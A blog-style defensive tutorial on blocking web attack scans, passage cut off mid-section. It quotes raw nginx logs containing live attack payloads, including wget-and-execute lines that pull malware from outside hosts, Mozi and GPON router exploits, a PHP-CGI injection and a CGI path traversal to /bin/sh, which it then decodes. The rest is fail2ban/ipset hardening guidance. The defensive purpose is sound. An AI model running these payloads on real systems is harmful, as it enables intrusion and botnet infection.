Defending a Web Server Against Attack Scans

Log details:

Only part of the log is listed here. The attack activity is in fact substantial: this small site sees attacks or malicious scans from a few hundred IPs practically every day.

8.219.50.197 - - [11/Aug/2025:02:53:35 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1" 400 150 "-" "-" "-"
172.203.234.251 - - [11/Aug/2025:02:54:03 +0800] "GET /owa/auth/logon.aspx HTTP/1.1" 403 146 "-" "Mozilla/5.0 zgrab/0.x" "-"
159.89.171.89 - - [11/Aug/2025:03:23:43 +0800] "" 400 0 "-" "-" "-"
205.210.31.195 - - [11/Aug/2025:04:04:06 +0800] "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x9B\xA2~|6\x19\xA1\xC0\xA5\xAF\xCCf\xDF\xD6Zl\xB4\xB31\xCB'\x84" 400 150 "-" "-" "-"
205.210.31.195 - - [11/Aug/2025:04:04:06 +0800] "\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03:\x83\xD8\xD8?\xAD\xB7\x80 \xFAc\xD1\xFE\xB0\xFE\x1E0\x8F Go\x8D\x05sU\xF9\xAD\xA9o5|\xE3\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0'\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0" 400 150 "-" "-" "-"
167.94.145.100 - - [11/Aug/2025:04:22:33 +0800] "PRI * HTTP/2.0" 400 150 "-" "-" "-"
117.209.93.63 - - [11/Aug/2025:04:48:18 +0800] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 150 "-" "-" "-"
103.56.60.82 - - [11/Aug/2025:05:13:49 +0800] "GET /cdn-cgi/trace HTTP/1.1" 404 13978 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-"
20.38.33.240 - - [11/Aug/2025:05:32:20 +0800] "SSH-2.0-Go" 400 150 "-" "-" "-"
20.38.33.240 - - [11/Aug/2025:05:32:20 +0800] "MGLNDD_107.173.244.159_443" 400 150 "-" "-" "-"
162.142.125.37 - - [11/Aug/2025:05:58:05 +0800] "PRI * HTTP/2.0" 400 150 "-" "-" "-"
170.64.177.244 - - [11/Aug/2025:07:24:57 +0800] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-"
170.64.177.244 - - [11/Aug/2025:07:24:58 +0800] "GET /.git/config HTTP/1.1" 301 162 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-"
162.142.125.44 - - [11/Aug/2025:07:29:42 +0800] "PRI * HTTP/2.0" 400 150 "-" "-" "-"
34.76.134.123 - - [11/Aug/2025:08:07:14 +0800] "GET / HTTP/1.1" 301 162 "-" "python-requests/2.32.4" "-"
87.236.176.124 - - [11/Aug/2025:08:42:23 +0800] "GET / HTTP/1.1" 403 146 "http://107.173.244.159" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-"
101.126.128.249 - - [11/Aug/2025:08:54:59 +0800] "GET / HTTP/1.1" 403 146 "-" "sqlmap" "-"
170.106.148.137 - - [11/Aug/2025:08:55:26 +0800] "GET / HTTP/1.1" 400 248 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-"
193.32.249.162 - - [11/Aug/2025:09:11:30 +0800] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-"
162.216.149.70 - - [11/Aug/2025:09:19:25 +0800] "GET / HTTP/1.1" 403 146 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-"
104.23.217.30 - - [11/Aug/2025:09:21:05 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 403 13978 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "2a06:98c0:3600::103"
172.68.10.207 - - [11/Aug/2025:09:21:23 +0800] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 403 13978 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "2a06:98c0:3600::103"
101.126.128.249 - - [11/Aug/2025:09:31:01 +0800] "GET /?n=%0A&cmd=whoami&search=%25xxx%25url%25:%password%7D%7B.exec|%7B.?cmd.%7D|timeout=15|out=abc.%7D%7B.?n.%7D%7B.?n.%7DRESULT:%7B.?n.%7D%7B.^abc.%7D====%7B.?n.%7D HTTP/1.1" 403 146 "-" "curl/7.29.0" "-"
65.49.1.152 - - [11/Aug/2025:10:01:04 +0800] "GET /webui/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" "-"
101.126.128.249 - - [11/Aug/2025:10:21:10 +0800] "GET / HTTP/1.1" 403 146 "-" "sqlmap" "-"
148.113.210.228 - - [11/Aug/2025:11:00:18 +0800] "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x92$bo \xFD\x88UT\xDDF\xC7p\x8C\xA9F\xB0\x90DJ\xA5H3(\xCB\xDD$\x9A\xD4\x9F\xFCL \xDE\xAF\x8A\xCC\xD3V\x95Y\xB6\x84Lo(\x89\xF2\xB72'\x22\x95\xD9\xB6\x00\xE5\xB6\xA2\xB6&\xC6Lk\x9A\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0" 400 150 "-" "-" "-"
167.172.89.156 - - [11/Aug/2025:11:52:38 +0800] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
167.172.89.156 - - [11/Aug/2025:11:52:38 +0800] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
167.172.89.156 - - [11/Aug/2025:11:52:39 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 301 162 "-" "libredtail-http" "-"
212.20.145.175 - - [11/Aug/2025:12:06:37 +0800] "GET / HTTP/1.0" 301 162 "-" "-" "-"
35.203.210.206 - - [11/Aug/2025:12:10:20 +0800] "GET / HTTP/1.1" 403 146 "http://107.173.244.159:80/" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-"
217.156.22.214 - - [11/Aug/2025:12:59:27 +0800] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
217.156.22.214 - - [11/Aug/2025:12:59:27 +0800] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
217.156.22.214 - - [11/Aug/2025:12:59:27 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 301 162 "-" "libredtail-http" "-"
217.156.22.214 - - [11/Aug/2025:12:59:28 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 13978 "-" "libredtail-http" "-"
167.94.146.52 - - [11/Aug/2025:13:13:19 +0800] "PRI * HTTP/2.0" 400 150 "-" "-" "-"
167.94.146.50 - - [11/Aug/2025:13:14:12 +0800] "PRI * HTTP/2.0" 400 150 "-" "-" "-"
167.94.138.61 - - [11/Aug/2025:13:25:09 +0800] "GET / HTTP/1.1" 403 146 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-"
107.173.244.159 - - [11/Aug/2025:13:42:46 +0800] "GET /images/tools/ipinfo.png HTTP/1.1" 404 14129 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "-"
41.238.71.170 - - [11/Aug/2025:13:57:49 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1" 400 150 "-" "-" "-"
107.173.244.159 - - [11/Aug/2025:14:37:09 +0800] "GET /ipinfo?format=json HTTP/1.1" 404 14114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "-"
27.128.25.63 - - [11/Aug/2025:14:37:25 +0800] "GET /ipinfo?format=json HTTP/1.1" 404 14114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "-"
68.183.82.202 - - [11/Aug/2025:14:38:10 +0800] "GET /ab2g HTTP/1.1" 403 146 "-" "Mozilla/5.0 zgrab/0.x" "-"
107.173.244.159 - - [11/Aug/2025:14:40:16 +0800] "GET /ipinfo?format=json HTTP/1.1" 404 14114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "-"
107.173.244.159 - - [11/Aug/2025:14:40:47 +0800] "GET /ipinfo?format=json HTTP/1.1" 404 14114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "-"
172.202.118.43 - - [11/Aug/2025:14:41:46 +0800] "GET /developmentserver/metadatauploader HTTP/1.1" 301 162 "-" "Mozilla/5.0 zgrab/0.x" "-"
101.126.128.249 - - [11/Aug/2025:15:01:23 +0800] "GET / HTTP/1.1" 403 146 "-" "sqlmap" "-"
8.219.58.39 - - [11/Aug/2025:15:10:27 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1" 400 150 "-" "-" "-"
104.234.115.197 - - [11/Aug/2025:15:15:11 +0800] "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x1E\x92j\xAF\x97\x13\x81m\xF0\xC5\x94\x05\xAAg\x093\xE5\xDC\x16E\x1E\x0F\xED\xBE~\xAA1\x0E\x9F?\xC8- \x8Emc\xDA\xEA\xAB\xE2\xA2\xB71\xAE \x14\x07\x1F\x9E\x10\xC0\xD5\xE0\xE3" 400 150 "-" "-" "-"
172.178.83.104 - - [11/Aug/2025:23:02:48 +0800] "GET /developmentserver/metadatauploader HTTP/1.1" 403 146 "-" "Mozilla/5.0 zgrab/0.x" "-"
34.135.131.184 - - [11/Aug/2025:23:07:54 +0800] "\x16\x03\x01\x00M\x01\x00\x00I\x03\x03\xC4\xE8\xC0\x11\xA8\x1F\x95`<\x83i\x97\x0E\x0B \x83\xA7\xE3H1M\x96\x5C7+\xD1\x8D\xCAv\x96u\xAF \x8A\xD6M;\x09\x9F\xF4w\xF9\xA7\x8D\x91" 400 150 "-" "-" "-"
20.169.104.180 - - [11/Aug/2025:23:33:56 +0800] "GET / HTTP/1.1" 400 248 "-" "Mozilla/5.0 zgrab/0.x" "-"
95.215.0.144 - - [11/Aug/2025:23:35:56 +0800] "GET / HTTP/1.1" 400 248 "-" "fasthttp" "-"
95.215.0.144 - - [11/Aug/2025:23:35:56 +0800] "GET /aaa9 HTTP/1.1" 404 14114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-"
95.215.0.144 - - [11/Aug/2025:23:35:56 +0800] "GET /aaa9 HTTP/1.1" 400 650 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-"
83.222.191.218 - - [12/Aug/2025:00:44:31 +0800] "GET / HTTP/1.1" 403 146 "-" "Mozilla/5.0 zgrab/0.x" "-"
172.68.243.36 - - [12/Aug/2025:01:03:29 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "2a06:98c0:3600::103"
162.158.134.112 - - [12/Aug/2025:01:03:30 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 403 14114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "2a06:98c0:3600::103"
172.70.240.3 - - [12/Aug/2025:01:04:53 +0800] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "2a06:98c0:3600::103"
172.70.240.147 - - [12/Aug/2025:01:04:54 +0800] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 403 14114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "2a06:98c0:3600::103"
185.177.72.57 - - [12/Aug/2025:01:05:37 +0800] "GET /.git/HEAD HTTP/1.1" 301 162 "-" "-" "-"
124.71.231.117 - - [12/Aug/2025:01:14:07 +0800] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
124.71.231.117 - - [12/Aug/2025:01:14:08 +0800] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
124.71.231.117 - - [12/Aug/2025:01:14:08 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 301 162 "-" "libredtail-http" "-"
114.34.131.134 - - [12/Aug/2025:01:42:40 +0800] "GET / HTTP/1.0" 301 162 "-" "-" "-"
94.72.107.3 - - [12/Aug/2025:02:51:58 +0800] "POST /boaform/admin/formLogin HTTP/1.1" 301 162 "http://107.173.244.159:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "-"
94.72.107.3 - - [12/Aug/2025:02:51:58 +0800] "" 400 0 "-" "-" "-"
113.238.76.71 - - [12/Aug/2025:02:58:48 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 301 162 "-" "Hello, World" "-"
113.238.76.71 - - [12/Aug/2025:02:58:50 +0800] "sh+/tmp/gpon80&ipv=0" 400 150 "-" "-" "-"
156.211.246.3 - - [12/Aug/2025:04:53:54 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1" 400 150 "-" "-" "-"
45.227.254.146 - - [12/Aug/2025:05:23:24 +0800] "GET /RDWeb/Pages/ HTTP/1.1" 404 14114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203" "-"
190.92.243.48 - - [12/Aug/2025:05:45:13 +0800] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
104.152.52.154 - - [12/Aug/2025:05:52:56 +0800] "\x16\x03\x01\x00\xE6\x01\x00\x00\xE2\x03\x03i\x9E+C\xDE\xD4y;:{\x1C" 400 150 "-" "-" "-"
104.152.52.162 - - [12/Aug/2025:05:52:56 +0800] "GET / HTTP/1.1" 301 162 "-" "curl/7.61.1" "-"
104.152.52.162 - - [12/Aug/2025:05:52:56 +0800] "GET /favicon.ico HTTP/1.1" 301 162 "-" "curl/7.61.1" "-"
198.235.24.101 - - [12/Aug/2025:06:17:52 +0800] "\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03u(?" 400 150 "-" "-" "-"
198.235.24.101 - - [12/Aug/2025:06:17:52 +0800] "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03p\xAB}7\xFD\x99\xB97\x04B\xAC\x80\x08\xB21\xB9\xB0\xE9\xE6d\xBD7V\xD6fY\xA1\xE1\xF9" 400 150 "-" "-" "-"
20.106.196.31 - - [12/Aug/2025:06:34:13 +0800] "GET /manager/text/list HTTP/1.1" 400 248 "-" "Mozilla/5.0 zgrab/0.x" "-"
135.237.127.190 - - [12/Aug/2025:07:24:50 +0800] "GET /version HTTP/1.1" 403 146 "-" "Mozilla/5.0 zgrab/0.x" "-"
198.235.24.207 - - [12/Aug/2025:08:15:50 +0800] "GET / HTTP/1.1" 403 146 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-"
20.65.193.243 - - [12/Aug/2025:08:17:38 +0800] "GET /manager/text/list HTTP/1.1" 301 162 "-" "Mozilla/5.0 zgrab/0.x" "-"
165.22.173.123 - - [12/Aug/2025:08:20:19 +0800] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-"
165.22.173.123 - - [12/Aug/2025:08:20:19 +0800] "GET /.git/config HTTP/1.1" 301 162 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-"
194.164.107.4 - - [12/Aug/2025:09:03:19 +0800] "\x16\x03\x01\x00\xE8\x01\x00\x00\xE4\x03\x03p\xB7\xFB(\x8E?x\x1AG\xD6<]\x093B\x85\x1D\xF1@u\xAF\x01:~0[\xF2\x98\xA0\xB2l\xD4 \x12Z\xA7\xB0\x8C@\x8A!)gg\x9A4\x94\x1D\x09m\xA5ZP\xBC\xC75t\xC4w|\x1BVC\xCD\x9F\x00 zz\x13\x01\x13\x02\x13\x03\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x13\xC0\x14\x00\x9C\x00\x9D\x00/\x005\x01\x00\x00{\x00\x05\x00\x05\x01\x00\x00\x00\x00\x00" 400 150 "-" "-" "-"
34.38.154.242 - - [12/Aug/2025:09:13:08 +0800] "GET / HTTP/1.1" 403 146 "-" "python-requests/2.32.4" "-"


Malicious requests

Take the following two log lines as an example:

167.172.89.156 - - [11/Aug/2025:11:52:38 +0800] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
167.172.89.156 - - [11/Aug/2025:11:52:38 +0800] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
  • This is a classic directory traversal attack: it tries to break out of the web root and reach a system executable, here /bin/sh.
  • %2e is the URL encoding of "."; chained %2e sequences are meant to become a ../../../../ path after decoding. The first line mixes a literal dot with an encoded one (.%2e/), which is the trick against servers that strip ".." before decoding; the second line goes one step further and double-encodes the dots.
  • The target path /cgi-bin/... is the CGI entry point that many devices (routers, cameras, old servers) leave exposed.
  • The aim is remote code execution (RCE), or to use sh to start a reverse shell.

Breaking down the key parts:

* `POST /cgi-bin/.../bin/sh`: the request enters through the CGI directory `/cgi-bin` and walks up to the system shell, Linux's `/bin/sh`.
* `%%32%65` is actually a double-encoded **`.` character**

---

### 🧠 What is `%%32%65`?

#### One round of decoding: `%32%65`

* `%32` = ASCII `'2'`
* `%65` = ASCII `'e'`
* `%2e` = ASCII `.` (period)

So `%2e` is `.`
But the attacker used **double encoding: `%%32%65` → `%2e` → `.`**. After the first decode, the leading `%` survives (on its own it is not a valid escape) and joins the decoded `2e`, giving the single-encoded `%2e`; a second decode turns that into `.`.

#### Final result:
/cgi-bin/%%32%65%%32%65/.../bin/sh
↓
/cgi-bin/%2e%2e/%2e%2e/%2e%2e/.../bin/sh
↓
/cgi-bin/../../../../../../bin/sh

In other words, each `..` climbs one directory; after enough of them the path escapes the CGI directory and ends at the `/bin/sh` command interpreter on the server's filesystem root.
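To make the decoding chain concrete, here is an added example (my code, not part of the original post) that decodes both request paths from the two log lines step by step and contrasts two ways a server might resolve them: normalizing the still-encoded path and decoding afterwards (the order the payloads are built to bypass), and decoding first, then normalizing and refusing anything that leaves the CGI directory. The `/cgi-bin` root and the decode-twice behaviour of the bypassable handler are assumptions made for the demonstration.

```python
# Added example (mine, not from the original post): decode the two traversal
# payloads from the log lines above step by step, and contrast a handler that
# normalizes the encoded path before decoding (the bypassable order) with one
# that decodes first and then refuses anything outside the CGI directory.
import posixpath
from typing import List, Optional
from urllib.parse import unquote

# Request targets copied from the two log lines (the double-encoded one is
# shortened to three segments; the real request had seven).
RAW_MIXED = "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"
RAW_DOUBLE = "/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh"

CGI_ROOT = "/cgi-bin"  # assumed directory the CGI handler is confined to


def decode_steps(path: str, rounds: int = 2) -> List[str]:
    """Return [raw, after one percent-decode, after two, ...]."""
    steps = [path]
    for _ in range(rounds):
        steps.append(unquote(steps[-1]))
    return steps


def resolve_normalize_then_decode(path: str, decode_rounds: int) -> str:
    """The bypassable order.

    Dot-segment removal runs on the still-encoded string, where '.%2e' and
    '%2e%2e' are ordinary directory names, so nothing collapses. Decoding
    happens afterwards, and the '..' that appears then is honoured by the
    filesystem when the file is opened (modelled here by the final normpath).
    """
    normalized = posixpath.normpath(path)
    decoded = normalized
    for _ in range(decode_rounds):
        decoded = unquote(decoded)
    return posixpath.normpath(decoded)


def resolve_decode_then_normalize(path: str, root: str = CGI_ROOT) -> Optional[str]:
    """The safe order: decode exactly once, reject anything that still looks
    encoded, normalize, and refuse paths that leave `root`.
    Returns None for a rejected request (the case nginx answers with a 400)."""
    decoded = unquote(path)
    if "%" in decoded:  # '%%32%65' decodes to '%2e': a second layer or an invalid escape
        return None
    norm = posixpath.normpath(decoded)
    if norm != root and not norm.startswith(root + "/"):
        return None
    return norm


if __name__ == "__main__":
    for label, raw in (("mixed", RAW_MIXED), ("double", RAW_DOUBLE)):
        print(label, "->", " => ".join(decode_steps(raw)))
        print("  normalize-then-decode, 1 decode :", resolve_normalize_then_decode(raw, 1))
        print("  normalize-then-decode, 2 decodes:", resolve_normalize_then_decode(raw, 2))
        print("  decode-then-normalize           :", resolve_decode_then_normalize(raw))
```

Note the difference between the two payloads: the mixed `.%2e/` form only needs a handler that normalizes before decoding once, while the `%%32%65` form only reaches `/bin/sh` if the handler decodes twice; with a single decode it stays a harmless-looking `%2e%2e` directory name.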


Attack goal:

  • This request is the classic directory traversal + RCE combination.

  • If the server is misconfigured or running a vulnerable version, the attacker can run commands like this:

    POST /cgi-bin/../../.../bin/sh
    Content: echo; id
    

    The leading `echo;` prints the blank line that CGI requires between headers and body, so the output of `id` comes back in the response: the identity of the user the web server runs as. If that is an unprivileged user, the damage is contained; if it is root, the attacker can take over the whole machine.


Nginx currently returns status 400

  • That means the request was rejected as malformed: nginx decodes the URI once, refuses a path whose ".." segments climb above the root, and treats "%%" as an invalid escape, so neither variant got anywhere and the attempt did not succeed.
  • **But!** The attacker is probing whether you are vulnerable. This exact pattern targets the 2021 path-normalization bug in Apache httpd 2.4.49/2.4.50 with mod_cgi enabled, and an outdated Apache, Tomcat or PHP-CGI deployment with a similar flaw could execute it.

Main methods and ideas for defending against this kind of attack:

Web server layer

  • Strict access control

    • Close unnecessary endpoints and paths; do not expose sensitive directories such as /wp-includes/, /cgi-bin/, /admin/ or /.git/.
    • Put access controls on sensitive directories and endpoints; allow only trusted IPs or logged-in users.
    • Make sure 404 and 403 responses do not leak server information.
  • Rate limiting and banning (Fail2ban, nginx rate limits, etc.)

    • Use Fail2ban with rules over the nginx log to ban IPs that repeatedly hit sensitive paths or send requests with attack signatures.
    • Use nginx's built-in limit_req / limit_conn modules to cap per-IP request rates and stop request floods.
    • Back this up with the firewall (iptables, firewalld) to limit abnormal connections.
  • Web application firewall (WAF)

    • Use a WAF (ModSecurity, Cloudflare WAF, Alibaba Cloud / Tencent Cloud WAF) to filter malicious requests and block SQL injection, XSS, path traversal and similar attacks.
    • A WAF can also recognize crawler and automated-attack signatures and block them automatically.

Application layer

  • Code security and vulnerability patching

    • Update applications and dependencies regularly to patch vulnerabilities.
    • Forbid unauthorized access; implement proper authentication and authorization.
    • Validate and filter all user input strictly to prevent injection attacks.
  • Hide sensitive information and interfaces

    • Hide version strings, stack traces and detailed error messages so they give attackers no hints.
    • Move default admin paths to non-standard locations.

Network layer

  • Anti-DDoS services

    • Use a cloud provider or hardware appliance for traffic scrubbing against volumetric attacks.
    • Limit connections per IP and drop anomalous protocol-level traffic.
  • Allowlist / blocklist management

    • Allowlist trusted IPs and restrict sensitive operations to them.
    • Record and analyze anomalous traffic and add its sources to the blocklist automatically.

Log monitoring and response

  • Real-time access-log monitoring

    • Use fail2ban, ELK or similar systems to analyze logs and spot abnormal behaviour.
    • Audit abnormal requests regularly and tune the protection rules.
  • Automated response

    • Have security tooling ban attacking IPs or adjust firewall rules automatically.
    • Configure alerts so administrators are notified promptly.

Common practical tools and techniques

  • Fail2ban: automatically bans abusive IPs
  • nginx rate-limit modules: limit request rates
  • ModSecurity: open-source WAF module
  • Cloud WAF: application-layer security service from cloud vendors
  • iptables/firewalld: network-layer blocking rules
  • Log analysis: ELK, Graylog, Splunk, etc.

Quick summary

| Measure | Purpose | Recommended action |
| --- | --- | --- |
| Web server configuration | Restrict path access, hide information | Block sensitive paths, hide details in 404 pages |
| Fail2ban banning | Automatically ban malicious IPs | Write precise rules and ban attackers promptly |
| nginx rate limiting | Prevent request floods | Limit per-IP connections and request rate |
| WAF | Filter attack requests | Deploy ModSecurity or a cloud WAF |
| Code security | Patch vulnerabilities, filter input | Update regularly, prevent injection and known bugs |
| Traffic scrubbing / anti-DDoS | Stop large-scale attacks | Cloud scrubbing, device-level rate limits |
| Log monitoring and alerting | Respond quickly to incidents | Automatic bans, alert notifications |

Concrete defense setup

This server did not cost much and I don't intend to spend more on it, so everything below uses free tools. Take it as a reference only.

Install the defense tools

I use fail2ban + ipset here, which has the smallest performance cost. fail2ban alone also works, but once the ban list grows it adds one iptables rule per banned IP and that starts to hurt performance, whereas an ipset hash set is a single rule no matter how many IPs it holds.

yum install epel-release -y
yum install ipset -y
yum install fail2ban -y

Confirm the installation:

fail2ban-client --version

Configure fail2ban

The default configuration lives under /etc/fail2ban/:

  • The main configuration file is /etc/fail2ban/jail.conf (do not edit it directly).
  • Put custom settings in /etc/fail2ban/jail.local or /etc/fail2ban/jail.d/*.local (fail2ban also reads jail.d/*.conf); these survive package upgrades.
  • Everything below uses custom files.

Create the Fail2Ban ipset ban action

Fail2Ban's default ban action edits iptables directly; we change it to use ipset.

Create the custom action file

## Note: this file ships with fail2ban. Back it up, then replace its entire content with the custom rules below; using the stock file unchanged causes problems here.
mv /etc/fail2ban/action.d/iptables-ipset-proto4.conf /etc/fail2ban/action.d/iptables-ipset-proto4.conf.bak
vim /etc/fail2ban/action.d/iptables-ipset-proto4.conf

Paste the following:

[Definition]

# Run when the jail starts:
# 1. Create an ipset of type hash:ip (IPv4) whose entries expire after <bantime> seconds;
#    -exist keeps this from failing if the set already exists.
# 2. Insert an iptables rule at the top of INPUT that DROPs any packet whose source is in the set.
actionstart =
    ipset create <name> hash:ip family inet timeout <bantime> -exist
    iptables -I INPUT -m set --match-set <name> src -j DROP

# Run when the jail stops:
# 1. Remove the DROP rule from INPUT
# 2. Flush every IP from the set
# 3. Destroy the set
actionstop =
    iptables -D INPUT -m set --match-set <name> src -j DROP
    ipset flush <name>
    ipset destroy <name>

# Sanity check: exit 0 if the set exists, non-zero otherwise
# (fail2ban re-runs actionstart before banning when this fails)
actioncheck =
    ipset list <name> > /dev/null 2>&1

# Ban an IP by adding it to the set.
# -exist avoids an error when the IP is already present.
# No per-entry timeout here: the entry inherits the default timeout given at set creation.
actionban =
    ipset add <name> <ip> -exist

# Unban an IP by removing it from the set; ignore the error if it is already gone
actionunban =
    ipset del <name> <ip> 2>/dev/null || true

[Init]
# Default set name; the jail overrides it, e.g. iptables-ipset-proto4[name=nginx-malicious]
name = default

Create a custom jail that uses the ipset action

The rule below bans an IP for 20 days (1728000 seconds). maxretry = 1 means a single matching log line is enough, so list your own admin addresses in ignoreip before enabling it.

